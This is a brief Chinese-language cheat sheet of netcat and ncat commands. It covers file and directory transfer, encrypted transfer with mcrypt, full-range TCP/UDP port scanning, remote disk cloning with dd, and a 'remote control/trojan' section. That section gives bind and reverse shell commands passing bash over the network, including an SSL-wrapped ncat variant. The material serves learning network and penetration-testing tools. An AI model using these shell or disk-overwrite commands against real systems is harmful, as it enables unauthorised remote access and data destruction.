NC
NC的一些功能
侦听模式 / 传输模式
telnet / 获取banner信息
传输文本信息
传输文件/目录
加密传输文文件
远程控制/木马
加密所有流量
流媒体服务器
远程克隆硬盘
传输文件
A: nc -lp 333 > 1.mp4
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1
或
A: nc - q 1 -lp 333 < a.mp4
B: nc -nv 1.1.1.1 333 > 2.mp4
传输目录
A : tar -cvf - music/ | nc -lp 333 —q 1
B : nc-nv 1.1.1.1 333 | tar -xvf-
加密传输文件
命令用到的参数有,--flush 立即冲洗输出,-F 输出数据,-b 不保留算法信息,-q 关闭一些非严重的警告,-d 解密
A : nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B : mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333-q 1
扫描端口
nc -nvz 1.1.1.1 1-65535
所有端口全扫一遍,默认探测TCP端口
nc -nvzu 1.1.1.1 1-65535
所有端口全扫一遍,默认探测UDP端口, 1-65535表示扫面端口的范围
远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sdaB: ddif=/dev/sda | nc -nv 1.1.1.1 333 -q 1
远程控制
方法一:在服务器端:nc -lp 333(打开的端口)
在客户端:nc -nv (服务器IP) 333 -c bash
将客户端的bash传给了服务器
方法二:在服务器端:nc -lp 333(打开的端口)-c bash
在客户端:nc -nv (服务器IP) 333
将服务器端的bash传给了客户端
NCat
功能:用来弥补NC缺乏加密、身份验证的能力
服务器端侦听333端口:
Ncat -c bash --allow 192.168.1.119(IP) -nvl 333 --ssl
(身份验证)允许此IP来连接我 使用ssl来加密
客户端:
Ncat -nv 192.168.1.115 333 --ssl
